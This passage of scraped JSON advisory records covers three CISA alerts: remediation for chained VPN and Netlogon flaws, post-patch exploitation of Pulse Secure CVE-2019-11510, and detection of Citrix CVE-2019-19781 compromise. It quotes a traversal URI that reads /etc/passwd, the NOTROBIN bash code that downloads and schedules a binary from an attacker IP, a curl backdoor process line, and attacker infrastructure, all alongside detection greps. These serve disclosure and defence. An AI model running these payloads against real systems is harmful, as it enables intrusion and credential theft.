Reset all account passwords (passwords should be 15 characters or more and randomly assigned): \n\n 1. User accounts (forced reset with no legacy password reuse)\n 2. Local accounts on hosts (including local accounts not covered by Local Administrator Password Solution [LAPS])\n 3. Service accounts\n 4. Directory Services Restore Mode (DSRM) account\n 5. Domain Controller machine account\n 6. Application passwords\n 5. Reset the `krbtgt` password again\n 6. Wait for the `krbtgt` reset to propagate to all domain controllers (time may vary)\n 7. Reboot domain controllers\n 8. Reboot all endpoints\n\nThe following accounts should be reset:\n\n * AD Kerberos Authentication Master (2x)\n * All Active Directory Accounts\n * All Active Directory Admin Accounts\n * All Active Directory Service Accounts\n * All Active Directory User Accounts\n * DSRM Account on Domain Controllers\n * Non-AD Privileged Application Accounts\n * Non-AD Unprivileged Application Accounts\n * Non-Windows Privileged Accounts\n * Non-Windows User Accounts\n * Windows Computer Accounts\n * Windows Local Admin\n\n### CVE-2020-1472\n\nTo secure your organization\u2019s Netlogon channel connections:\n\n * **Update all Domain Controllers and Read Only Domain Controllers**. On August 11, 2020, Microsoft released [software updates](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1472>) to mitigate CVE-2020-1472. 
Applying this update to domain controllers is currently the only mitigation to this vulnerability (aside from removing affected domain controllers from the network).\n * **Monitor for new events, and address non-compliant devices** that are using vulnerable Netlogon secure channel connections.\n * **Block public access to potentially vulnerable ports**, such as 445 (Server Message Block [SMB]) and 135 (Remote Procedure Call [RPC]).\n\nTo protect your organization against this CVE, follow [advice from Microsoft](<https://support.microsoft.com/en-us/help/4557222/how-to-manage-the-changes-in-netlogon-secure-channel-connections-assoc>), including:\n\n * Update your domain controllers with an update released August 11, 2020, or later.\n * Find which devices are making vulnerable connections by monitoring event logs.\n * Address non-compliant devices making vulnerable connections.\n * Enable enforcement mode to address [CVE-2020-1472](<https://nvd.nist.gov/vuln/detail/CVE-2020-1472>) in your environment.\n\n### VPN Vulnerabilities\n\nImplement the following recommendations to secure your organization\u2019s VPNs:\n\n * **Update VPNs, network infrastructure devices, and devices **being used to remote into work environments with the latest software patches and security configurations. See CISA Tips [Understanding Patches and Software Updates](<https://us-cert.cisa.gov/ncas/tips/ST04-006>) and [Securing Network Infrastructure Devices](<https://us-cert.cisa.gov/ncas/tips/ST18-001>). Wherever possible, enable automatic updates. See table 1 for patch information on VPN-related CVEs mentioned in this report.\n * **Implement multi-factor authentication (MFA) on all VPN connections to increase security**. Physical security tokens are the most secure form of MFA, followed by authenticator app-based MFA. SMS and email-based MFA should only be used when no other forms are available. If MFA is not implemented, require teleworkers to use strong passwords. 
See CISA Tips [Choosing and Protecting Passwords](<https://us-cert.cisa.gov/ncas/tips/ST04-002>) and [Supplementing Passwords](<https://us-cert.cisa.gov/ncas/tips/ST05-012>) for more information.\n\nDiscontinue unused VPN servers. Reduce your organization\u2019s attack surface by discontinuing unused VPN servers, which may act as a point of entry for attackers. To protect your organization against VPN vulnerabilities:\n\n * **Audit **configuration and patch management programs.\n * **Monitor** network traffic for unexpected and unapproved protocols, especially outbound to the internet (e.g., Secure Shell [SSH], SMB, RDP).\n * **Implement **MFA, especially for privileged accounts.\n * **Use **separate administrative accounts on separate administration workstations.\n * **Keep **[software up to date](<https://us-cert.cisa.gov/ncas/tips/ST04-006>). Enable automatic updates, if available. \n\n### How to uncover and mitigate malicious activity\n\n * **Collect and remove** for further analysis: \n * Relevant artifacts, logs, and data.\n * **Implement **mitigation steps that avoid tipping off the adversary that their presence in the network has been discovered.\n * **Consider **soliciting incident response support from a third-party IT security organization to: \n * Provide subject matter expertise and technical support to the incident response.\n * Ensure that the actor is eradicated from the network.\n * Avoid residual issues that could result in follow-up compromises once the incident is closed.\n\n### Resources\n\n * [CISA VPN-Related Guidance](<https://www.cisa.gov/vpn-related-guidance>)\n * CISA Infographic: [Risk Vulnerability And Assessment (RVA) Mapped to the MITRE ATT&CK FRAMEWORK](<https://www.cisa.gov/sites/default/files/publications/Risk%20and%20Vulnerability%20Assessment%20%28RVA%29%20Mapped%20to%20the%20MITRE%20ATT%26amp%3BCK%20Framework%20Infographic_v6-100620_%20508.pdf>)\n * National Security Agency InfoSheet: [Configuring IPsec Virtual Private 
Networks](<https://media.defense.gov/2020/Jul/02/2002355501/-1/-1/0/CONFIGURING_IPSEC_VIRTUAL_PRIVATE_NETWORKS_2020_07_01_FINAL_RELEASE.PDF>)\n * CISA Joint Advisory: [AA20-245A: Technical Approaches to Uncovering and Remediating Malicious Activity](<https://us-cert.cisa.gov/ncas/alerts/aa20-245a>)\n * CISA Activity Alert: [AA20-073A: Enterprise VPN Security](<https://us-cert.cisa.gov/ncas/alerts/aa20-073a>)\n * CISA Activity Alert: [AA20-031A: Detecting Citrix CVE-2019-19781](<https://us-cert.cisa.gov/ncas/alerts/aa20-031a>)\n * CISA Activity Alert: [AA20-010A: Continued Exploitation of Pulse Secure VPN Vulnerability](<https://us-cert.cisa.gov/ncas/alerts/aa20-010a>)\n * **Cybersecurity Alerts and Advisories**: Subscriptions to [CISA Alerts](<https://public.govdelivery.com/accounts/USDHSUSCERT/subscriber/new>) and [MS-ISAC Advisories](<https://learn.cisecurity.org/ms-isac-subscription>)\n\n### Contact Information\n\nRecipients of this report are encouraged to contribute any additional information that they may have related to this threat.\n\nFor any questions related to this report or to report an intrusion and request resources for incident response or technical assistance, please contact:\n\n * CISA (888-282-0870 or [Central@cisa.dhs.gov](<mailto:Central@cisa.dhs.gov>)), or\n * The FBI through the FBI Cyber Division (855-292-3937 or [CyWatch@fbi.gov](<mailto:CyWatch@fbi.gov>)) or a [local field office](<https://www.fbi.gov/contact-us/field-offices/field-offices>)\n\n**_DISCLAIMER_**\n\n_This information is provided \"as is\" for informational purposes only. The United States Government does not provide any warranties of any kind regarding this information. 
In no event shall the United States Government or its contractors or subcontractors be liable for any damages, including but not limited to, direct, indirect, special or consequential damages, arising out of, resulting from, or in any way connected with this information, whether or not based upon warranty, contract, tort, or otherwise, whether or not arising out of negligence, and whether or not injury was sustained from, or arose out of the results of, or reliance upon the information._\n\n_The United States Government does not endorse any commercial product or service, including any subjects of analysis. Any reference to specific commercial products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply their endorsement, recommendation, or favoring by the United States Government._\n\n### References\n\n[[1] Fortinet Advisory: FG-IR-18-384 ](<https://www.fortiguard.com/psirt/FG-IR-18-384>)\n\n[[2] MobileIron Blog: MobileIron Security Updates Available](<https://www.mobileiron.com/en/blog/mobileiron-security-updates-available>)\n\n[[3] Microsoft Security Advisory for CVE-2020-1472](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1472>)\n\n[[4] Microsoft: AD Forest Recovery - Resetting the krbtgt password](<https://docs.microsoft.com/en-us/windows-server/identity/ad-ds/manage/ad-forest-recovery-resetting-the-krbtgt-password>)\n\n### Revisions\n\nOctober 9, 2020: Initial Version|October 11, 2020: Updated Summary|October 12, 2020: Added Additional Links\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": 
"2020-10-24T12:00:00", "type": "ics", "title": "APT Actors Chaining Vulnerabilities Against SLTT, Critical Infrastructure, and Elections Organizations", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-13379", "CVE-2019-11510", "CVE-2019-19781", "CVE-2020-1472", "CVE-2020-15505", "CVE-2020-1631", "CVE-2020-2021", "CVE-2020-5902", "CVE-2022-42475", "CVE-2022-47966"], "modified": "2020-10-24T12:00:00", "id": "AA20-283A", "href": "https://www.cisa.gov/news-events/cybersecurity-advisories/aa20-283a", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-09-23T07:43:42", "description": "### Summary\n\n_**Note: ** This Activity Alert uses the MITRE Adversarial Tactics, Techniques, and Common Knowledge (ATT&CK\u00ae) framework. 
See the [ATT&CK for Enterprise](<https://attack.mitre.org/versions/v7/matrices/enterprise/> \"Enterprise Matrix\" ) framework for all referenced threat actor techniques and mitigations._\n\nThis Alert provides an update to Cybersecurity and Infrastructure Security Agency (CISA) [Alert AA20-010A: Continued Exploitation of Pulse Secure VPN Vulnerability](<https://www.cisa.gov/news-events/cybersecurity-advisories/aa20-010a> \"Continued Exploitation of Pulse Secure VPN Vulnerability\" ), which advised organizations to immediately patch CVE-2019-11510\u2014an arbitrary file reading vulnerability affecting Pulse Secure virtual private network (VPN) appliances.[[1]](<https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44101> \"Pulse Secure Community\" ) CISA is providing this update to alert administrators that threat actors who successfully exploited CVE-2019-11510 and stole a victim organization\u2019s credentials will still be able to access\u2014and move laterally through\u2014that organization\u2019s network after the organization has patched this vulnerability if the organization did not change those stolen credentials.\n\nThis Alert provides new detection methods for this activity, including a [CISA-developed tool](<https://github.com/cisagov/check-your-pulse> \"cisagov / check-your-pulse\" ) that helps network administrators search for indicators of compromise (IOCs) associated with exploitation of CVE-2019-11510. This Alert also provides mitigations for victim organizations to recover from attacks resulting from CVE-2019-11510. CISA encourages network administrators to remain aware of the ramifications of exploitation of CVE-2019-11510 and to apply the detection measures and mitigations provided in this report to secure networks against these attacks.\n\nFor a downloadable copy of IOCs, see STIX file.\n\n#### **Background**\n\nCISA has conducted multiple incident response engagements at U.S. 
Government and commercial entities where malicious cyber threat actors have exploited CVE-2019-11510\u2014an arbitrary file reading vulnerability affecting Pulse Secure VPN appliances\u2014to gain access to victim networks. Although Pulse Secure released patches for CVE-2019-11510 in April 2019,[[2]](<https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44101> \"Pulse Secure Community\" ) CISA has observed incidents where compromised Active Directory credentials were used months after the victim organization patched its VPN appliance.\n\n### Technical Details\n\nCISA determined that cyber threat actors have been able to obtain plaintext Active Directory credentials after gaining _Initial Access_ [[TA0001]](<https://attack.mitre.org/versions/v7/tactics/TA0001/> \"Initial Access\" ) to a victim organization\u2019s network via VPN appliances. Cyber threat actors used these _Valid Accounts_ [[T1078]](<https://attack.mitre.org/versions/v7/techniques/T1078/> \"Valid Accounts\" ) in conjunction with:\n\n * _External Remote Services_ [[T1133]](<https://attack.mitre.org/versions/v7/techniques/T1133> \"External Remote Services\" ) for access,\n * _Remote Services_ [[T1021]](<https://attack.mitre.org/versions/v7/techniques/T1021> \"Remote Services\" ) for _Lateral Movement_ [[TA0008]](<https://attack.mitre.org/versions/v7/tactics/TA0008/> \"Lateral Movement\" ) to move quickly throughout victim network environments, and\n * _Data Encrypted for Impact_ [[T1486]](<https://attack.mitre.org/versions/v7/techniques/T1486> \"Data Encrypted for Impact\" ) for impact, as well as\n * _Exfiltration_ [[TA0010]](<https://attack.mitre.org/versions/v7/tactics/TA0010/> \"Exfiltration\" ) and sale of the data.\n\n### Initial Access\n\nCVE-2019-11510 is a pre-authentication arbitrary file read vulnerability affecting Pulse Secure VPN appliances. A remote attacker can exploit this vulnerability to request arbitrary files from a VPN server. 
The vulnerability occurs because directory traversal is hard coded to be allowed if the path contains `dana/html5acc/`.[[3]](<https://twitter.com/XMPPwocky/status/1164874297690611713/photo/1> \"Twitter\" ),[[4]](<https://opensecurity.global/forums/topic/184-pulse-secure-ssl-vpn-vulnerability-being-exploited-in-wild/?do=findComment&comment=848> \"184 Pulse Secure SSL VPN\" ) For example, a malicious cyber actor can obtain the contents of `/etc/passwd` [[5]](<https://github.com/BishopFox/pwn-pulse/blob/master/pwn-pulse.sh> \"BishopFox / pwn-pulse\" ) by requesting the following uniform resource identifier (URI):\n\n`https://vulnvpn.example[.]com/dana-na/../dana/html5acc/guacamole/../../../../../../../etc/passwd?/dana/html5acc/guacamole/`\n\nObtaining the contents of `/etc/passwd` gives the attacker access to basic information about local system accounts. This request was seen in the proof of concept (POC) code for this exploit on [Github](<https://github.com/BishopFox/pwn-pulse/blob/master/pwn-pulse.sh> \"BishopFox / pwn-pulse\" ). An attacker can also leverage the vulnerability to access other files that are useful for remote exploitation. 
By requesting the `data.mdb` object, an attacker can leak plaintext credentials of enterprise users.[[6]](<https://www.exploit-db.com/exploits/47297> \"Pulse Secure 8.1R15.1/8.2/8.3/9.0 SSL VPN - Arbitrary File Disclosure \\(Metasploit\\)\" ),[[7]](<https://twitter.com/alyssa_herrera_/status/1164089995193225216?s=11> \"Twitter\" ),[[8]](<https://opensecurity.global/forums/topic/184-pulse-secure-ssl-vpn-vulnerability-being-exploited-in-wild/?do=findComment&comment=848> \"184 Pulse Secure SSL VPN Vulnerability Being Exploited in the Wild\" )\n\nOpen-source reporting indicates that cyber threat actors can exploit CVE-2019-11510 to retrieve encrypted passwords;[[9]](<https://opensecurity.global/forums/topic/184-pulse-secure-ssl-vpn-vulnerability-being-exploited-in-wild/?tab=comments#comment-887> \"184 Pulse Secure SSL VPN Vulnerability Being Exploited in the Wild\" ) however, CISA has not observed this behavior. By reviewing victim VPN appliance logs, CISA has noted cyber threat actors crafting requests for files that allow _Credential Dumping_ [[T1003]](<https://attack.mitre.org/versions/v7/techniques/T1003> \"OS Credential Dumping\" ) of plaintext passwords from the VPN appliance.\n\n### Test Environment\n\nTo confirm the open-source reporting and validate what the cyber threat actors had access to, CISA used a test environment to send crafted requests. CISA used requests found both in open-source proof-of-concept code and in the logs of compromised victims. By doing so, CISA confirmed that plaintext Active Directory credentials were leaked and that it was possible to leak the local admin password to the VPN appliance. (See figure 1.)\n\n\n\n##### Figure 1: Exploitation of the VPN appliance leading to plaintext local admin credentials\n\nCISA\u2019s test environment consisted of a domain controller (DC) running Windows Server 2016, an attacker machine, and a Pulse Secure VPN appliance version 9.0R3 (build 64003). 
CISA connected the attacker machine to the external interface of the Pulse Secure VPN appliance and the DC to the internal interface.\n\nCISA created three accounts for the purpose of validating the ability to compromise them by exploiting CVE-2019-11510.\n\n * Local Pulse Secure Admin account\n   * Username: `admin`; Password: `pulse-local-password`\n * Domain Administrator Account\n   * Username: `Administrator`; Password: `domain-admin-password1`\n * CISA-test-user Account\n   * Username: `cisa-test-user`; Password: `Use_s3cure_passwords`\n\nAfter creating the accounts, CISA joined the VPN appliance to the test environment domain, making a point not to cache the domain administrator password. (See figure 2.)\n\n\n\n##### Figure 2: VPN appliance joined to the domain without caching the domain administrator password\n\nCISA used a similar file inclusion to test the ability to _Credential Dump_ [[T1003]](<https://attack.mitre.org/versions/v7/techniques/T1003> \"OS Credential Dumping\" ) the domain administrator password. CISA determined it was possible to leak the domain administrator password that was used to join the device to the domain without saving the credentials. Refer to figure 3 for the URI string tested by CISA.\n\n\n\n##### Figure 3: Exploitation of the VPN appliance leading to cleartext domain admin credentials\n\nNext, CISA validated the ability to _Credential Dump_ [[T1003]](<https://attack.mitre.org/versions/v7/techniques/T1003> \"OS Credential Dumping\" ) a user password from the VPN appliance. To do this, CISA created a _user realm_ (Pulse Secure configuration terminology) and configured its roles/resource groups to allow for Remote Desktop Protocol (RDP) over HTML5 (Apache Guacamole). After using the new user to remotely access an internal workstation over RDP, CISA used a crafted request (see figure 4) to leak the credentials from the device. 
(**Note:** the path to stored credentials is publicly available.)[[10]](<https://twitter.com/alyssa_herrera_/status/1164089995193225216?s=11>)\n\n\n\n##### Figure 4: Exploitation of the VPN appliance leading to plaintext user credentials\n\nThis test confirmed CISA\u2019s suspicion that threat actors had access to each of the various compromised environments.\n\n### Cyber Threat Actor Behavior in Victim Network Environments\n\nCISA observed\u2014once credentials were compromised\u2014cyber threat actors accessing victim network environments via the Pulse Secure VPN appliances. Cyber threat actors used _Connection Proxies_ [[T1090]](<https://attack.mitre.org/versions/v7/techniques/T1090> \"Proxy\" )\u2014such as Tor infrastructure and virtual private servers (VPSs)\u2014to minimize the chance of detection when they connected to victim VPN appliances.\n\nUsing traditional host-based analysis, CISA identified the following malicious cyber actor actions occurring in a victim\u2019s environment:\n\n * Creating persistence via scheduled tasks/remote access trojans\n * Amassing files for exfiltration\n * Executing ransomware on the victim\u2019s network environment\n\nBy correlating these actions with the connection times and user accounts recorded in the victim\u2019s Pulse Secure `.access` logs, CISA was able to identify unauthorized threat actor connections to the victim\u2019s network environment. CISA was then able to use these Internet Protocol (IP) addresses and user-agents to identify unauthorized connections to the network environments of other victims. Refer to the Indicators of Compromise section for the IP addresses CISA observed making these unauthorized connections.\n\nIn one case, CISA observed a cyber threat actor attempting to sell the stolen credentials after 30 unsuccessful attempts to connect to the customer environment to escalate privileges and drop ransomware. 
CISA has also observed this threat actor successfully dropping ransomware at hospitals and U.S. Government entities.\n\nIn other cases, CISA observed threat actors leveraging tools, such as LogMeIn and TeamViewer, for persistence. These tools would enable threat actors to maintain access to the victim\u2019s network environment if they lost their primary connection.\n\n### Initial Detection\n\nConventional antivirus and endpoint detection and response solutions did not detect this type of activity because the threat actors used legitimate credentials and remote services.\n\nAn intrusion detection system may have noticed the exploitation of CVE-2019-11510 if the sensor had visibility to the external interface of the VPN appliance (possible in a customer\u2019s demilitarized zone) and if appropriate rules were in place. Heuristics in centralized logging may have been able to detect logins from suspicious or foreign IPs, if configured.\n\n### Post-Compromise Detection and IOC Detection Tool\n\nGiven that organizations that have applied patches for CVE-2019-11510 may still be at risk for exploitation from compromises that occurred pre-patch, CISA developed detection methods for organizations to determine if their patched VPN appliances have been targeted by the activity revealed in this report.\n\nTo detect past exploitation of CVE-2019-11510, network administrators should:\n\n 1. Turn on logging of unauthenticated requests (see figure 5). (**Note:** there is a risk of overwriting logs with unauthenticated requests, so if enabling this feature, be sure to frequently back up logs; if possible, use a remote syslog server.)\n\n\n\n##### Figure 5: Checkbox that enables logging exploit attacks\n\n 2. Check logs for exploit attempts. To detect lateral movement, system administrators should look in the logs for strings such as `../../../data` (see figure 6).\n\n\n\n##### Figure 6: Strings for detection of lateral movement\n\n 3. 
Manually review logs for unauthorized sessions and exploit attempts, especially sessions originating from unexpected geo-locations.\n 4. Run CISA\u2019s IOC detection tool. CISA developed a tool that enables administrators to triage logs (if authenticated request logging is turned on) and automatically search for IOCs associated with exploitation of CVE-2019-11510. CISA encourages administrators to visit [CISA\u2019s GitHub page](<https://github.com/cisagov/check-your-pulse> \"cisagov / check-your-pulse\" ) to download and run the tool. While not exhaustive, this tool may find evidence of attempted compromise.\n\n### Indicators of Compromise\n\nCISA observed IP addresses making unauthorized connections to customer infrastructure. (**Note:** these IPs were observed as recently as February 15, 2020.) The IP addresses seen making unauthorized connections to customer infrastructure were different than IP addresses observed during initial exploitation. Please see the STIX file below for IPs.\n\nCISA observed the following user agents with this activity:\n\n * Mozilla/5.0 (Windows NT 6.1; rv:60.0) Gecko/20100101 Firefox/60.0\n * Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0\n * Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55[.]0.2883.87 Safari/537.36\n\nCISA also observed:\n\n * A cyber threat actor renaming portable executable (PE) files in an attempt to subvert application allow listing or antivirus (AV) protections. 
See table 1 for hashes of files used.\n * A threat actor \u201cliving off the land\u201d and utilizing C:\\Python\\ArcGIS to house malicious PE files, as well as using natively installed Python.\n * Threat actor attack infrastructure: 38.68.36(dot)112 ports 9090 and 8088\n\n##### Table 1: Filenames and hashes of files used by a threat actor\n\nFilename | MD5\n---|---\nt.py (tied to scheduled task, python meterpreter reverse shell port 9090) | 5669b1fa6bd8082ffe306aa6e597d7f5\ng.py (tied to scheduled task, python meterpreter reverse shell port 8088) | 61eebf58e892038db22a4d7c2ee65579\n\nFor a downloadable copy of IOCs, see STIX file.\n\n### Mitigations\n\nCISA strongly urges organizations that have not yet done so to upgrade their Pulse Secure VPN to the corresponding patches for CVE-2019-11510. If\u2014after applying the detection measures in this alert\u2014organizations detect evidence of CVE-2019-11510 exploitation, CISA recommends changing passwords for all Active Directory accounts, including administrator and service accounts.\n\nCISA also recommends that organizations:\n\n * Look for unauthorized applications and scheduled tasks in their environment.\n * Remove any remote access programs not approved by the organization.\n * Remove any remote access trojans.\n * Carefully inspect scheduled tasks for scripts or executables that may allow an attacker to connect to an environment.\n\nIf organizations find evidence of malicious, suspicious, or anomalous activity or files, they should consider reimaging the workstation or server and redeploying it into the environment. CISA recommends performing checks to ensure the infection is gone even if the workstation or host has been reimaged.\n\n### Contact Information\n\nTo report suspicious activity related to information found in this joint Cybersecurity Advisory, contact CISA\u2019s 24/7 Operations Center at report@cisa.gov or (888) 282-0870. 
When available, please include the information regarding the incident: date, time, and location of the incident; type of activity; number of people affected; type of equipment used for the activity; the name of the submitting company or organization; and a designated point of contact.\n\n**References**\n\n[[1] Pulse Secure Advisory SA44101 ](<https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44101> \"Pulse Secure Community\" )\n\n[[2] Pulse Secure Advisory SA44101](<https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44101> \"Pulse Secure Community\" )\n\n[[3] Twitter. @XMPPwocky. (2019, August 23). Your least favorite construct ](<https://twitter.com/XMPPwocky/status/1164874297690611713/photo/1> \"XMPPwocky\" )\n\n[[4] OpenSecurity Forums. Public vulnerability discussion. (2019, August 23). ](<https://opensecurity.global/forums/topic/184-pulse-secure-ssl-vpn-vulnerability-being-exploited-in-wild/?do=findComment&comment=848> \"OpenSecurity Forums\" )\n\n[[5] GitHub. BishopFox / pwn-pulse. ](<https://github.com/BishopFox/pwn-pulse/blob/master/pwn-pulse.sh> \"BishopFox / pwn-pulse\" )\n\n[[6] File disclosure in Pulse Secure SSL VPN (Metasploit) ](<https://www.exploit-db.com/exploits/47297> \"Pulse Secure 8.1R15.1/8.2/8.3/9.0 SSL VPN - Arbitrary File Disclosure \\(Metasploit\\)\" )\n\n[[7] Twitter. @alyssa_herra ](<https://twitter.com/alyssa_herrera_/status/1164089995193225216?s=11> \"Twitter\" )\n\n[[8] OpenSecurity Forums. Public vulnerability discussion. (2019, August 23). ](<https://opensecurity.global/forums/topic/184-pulse-secure-ssl-vpn-vulnerability-being-exploited-in-wild/?do=findComment&comment=848> \"OpenSecurity Forums\" )\n\n[[9] OpenSecurity Forums. Public vulnerability discussion. (2019, August 31). ](<https://opensecurity.global/forums/topic/184-pulse-secure-ssl-vpn-vulnerability-being-exploited-in-wild/?tab=comments#comment-887> \"OpenSecurity Forums\" )\n\n[[10] Twitter. 
@alyssa_herra](<https://twitter.com/alyssa_herrera_/status/1164089995193225216?s=11> \"Twitter\" )\n\n### Revisions\n\nApril 16, 2020: Initial Version\n\nOctober 23, 2020: Revision\n\nSeptember 05, 2023: Revision\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-10-24T12:00:00", "type": "ics", "title": "Continued Threat Actor Exploitation Post Pulse Secure VPN Patching", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-11510", "CVE-2022-42475", "CVE-2022-47966"], "modified": "2020-10-24T12:00:00", "id": "AA20-107A", "href": "https://www.cisa.gov/news-events/cybersecurity-advisories/aa20-107a", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-09-23T07:47:17", "description": "### Summary\n\nUnknown cyber network exploitation (CNE) actors have successfully compromised numerous organizations that employed vulnerable Citrix devices through a critical vulnerability known as CVE-2019-19781.[[1]](<https://www.citrix.com/blogs/2020/01/24/citrix-releases-final-fixes-for-cve-2019-19781/>)\n\nThough mitigations were released on the same day Citrix announced 
CVE-2019-19781, organizations that did not appropriately apply the mitigations were likely to be targeted once exploit code began circulating on the internet a few weeks later.\n\nCompromised systems cannot be remediated by applying software patches that were released to fix the vulnerability. Once CNE actors establish a foothold on an affected device, their presence remains even though the original attack vector has been closed.\n\nThe Cybersecurity and Infrastructure Security Agency (CISA) is releasing this Alert to provide tools and technologies to assist with detecting the presence of these CNE actors. Unpatched systems and systems compromised before the updates were applied remain susceptible to exploitation.\n\nContact [CISA](<https://www.us-cert.gov/report>), or the [FBI](<https://www.fbi.gov/contact-us/field-offices/field-offices>) to report an intrusion or to request assistance.\n\n### Technical Details\n\n## Detection\n\nCISA has developed the following procedures for detecting a CVE-2019-19781 compromise. \n\n#### HTTP Access and Error Log Review\n\n**Context:** Host Hunt\n\n**Type:** Methodology\n\nThe impacted Citrix products utilize Apache for web server software, and as a result, HTTP access and error logs should be available on the system for review in `/var/log`. 
Log files `httpaccess.log` and `httperror.log` should both be reviewed for the following Uniform Resource Identifiers (URIs), found in the proof of concept exploit that was released.\n\n * `'*/../vpns/*'`\n * `'*/vpns/cfg/smb.conf'`\n * `'*/vpns/portal/scripts/newbm.pl*'`\n * `'*/vpns/portal/scripts/rmbm.pl*'`\n * `'*/vpns/portal/scripts/picktheme.pl*'`\n\nNote: These URIs were observed in Security Information and Event Management detection content provided by <https://github.com/Neo23x0/sigma/blob/master/rules/web/web_citrix_cve_2019_19781_exploit.yml>.[[2]](<https://github.com/Neo23x0/sigma/blob/master/rules/web/web_citrix_cve_2019_19781_exploit.yml>)\n\nPer TrustedSec, a sign of successful exploitation would be a `POST` request to a URI containing `/../` or `/vpn`, followed by a GET request to an XML file. If any exploitation activity exists\u2014attempted or successful\u2014analysts should be able to identify the attacking Internet Protocol address(es). Tyler Hudak\u2019s blog provided sample logs indicating what a successful attack would look like.[[3]](<https://www.trustedsec.com/blog/netscaler-remote-code-execution-forensics/>)\n\n`10.1.1.1 - - [10/Jan/2020:13:23:51 +0000] \"POST /vpn/../vpns/portal/scripts/newbm.pl HTTP/1.1\" 200 143 \"https://10.1.1.2/\" \"USERAGENT \"`\n\n`10.1.1.1 - - [10/Jan/2020:13:23:53 +0000] \"GET /vpn/../vpns/portal/backdoor.xml HTTP/1.1\" 200 941 \"-\" \"USERAGENT\"`\n\nAdditionally, FireEye provided the following `grep` commands to assist with log review and help to identify suspicious activity.[[4]](<https://www.fireeye.com/blog/products-and-services/2020/01/rough-patch-promise-it-will-be-200-ok.html>)\n\n`grep -iE 'POST.*\\.pl HTTP/1\\.1\\\" 200 ' /var/log/httpaccess.log -A 1`\n\n`grep -iE 'GET.*\\.xml HTTP/1\\.1\\\" 200' /var/log/httpaccess.log -B 1`\n\n#### Running Processes Review\n\n**Context:** Host Hunt\n\n**Type:** Methodology\n\nReviewing the running processes on a system suspected of compromise for processes running 
under the `nobody` user can identify potential backdoors.\n\n`ps auxd | grep nobody`\n\nAnalysts should review the `ps` output for suspicious entries such as this (the leading `|` and `` `- `` characters are the process-tree drawing produced by `ps -d`):\n\n``nobody 63390 0.0 0.0 8320 16 ?? I 1:35PM 0:00.00 | | `- sh -c uname & curl -o - http://10.1.1.2/backdoor``\n\nFurther pivoting can be completed using the Process ID from the `ps` output:\n\n`lsof -p <pid>`\n\nDue to the nature of this exploit, it is likely that any processes related to a backdoor would be running under the `httpd` process.\n\n### Checking for NOTROBIN Presence\n\n**Context:** Host Hunt\n\n**Type:** Methodology\n\n`pkill -9 netscalerd; rm /var/tmp/netscalerd; mkdir /tmp/.init; curl -k hxxps://95.179.163[.]186/wp-content/uploads/2018/09/64d4c2d3ee56af4f4ca8171556d50faa -o /tmp/.init/httpd; chmod 744 /tmp/.init/httpd; echo \"* * * * * /var/nstmp/.nscache/httpd\" | crontab -; /tmp/.init/httpd &\"`\n\nThe above is the NOTROBIN Bash exploit code. To check for NOTROBIN presence, analysts should look for the staging directory at `/tmp/.init` as well as `httpd` processes running as a cron job.\n\nRunning the command `find / -name \".init\" 2> /tmp/error.log` should return the path to the created staging directory while redirecting all errors to a file located at `/tmp/error.log`.\n\n### Additional /var/log Review\n\n**Context:** Host Hunt\n\n**Type:** Methodology\n\nAnalysts should focus on reviewing the following logs in `/var/log` on the Citrix device, if available. The underlying operating system is based on FreeBSD, and the logs are similar to what would be found on a Linux system. Analysts should focus on log entries related to the `nobody` user or `(null) on` and should try to identify any suspicious commands that may have been run, such as `whoami` or `curl`. 
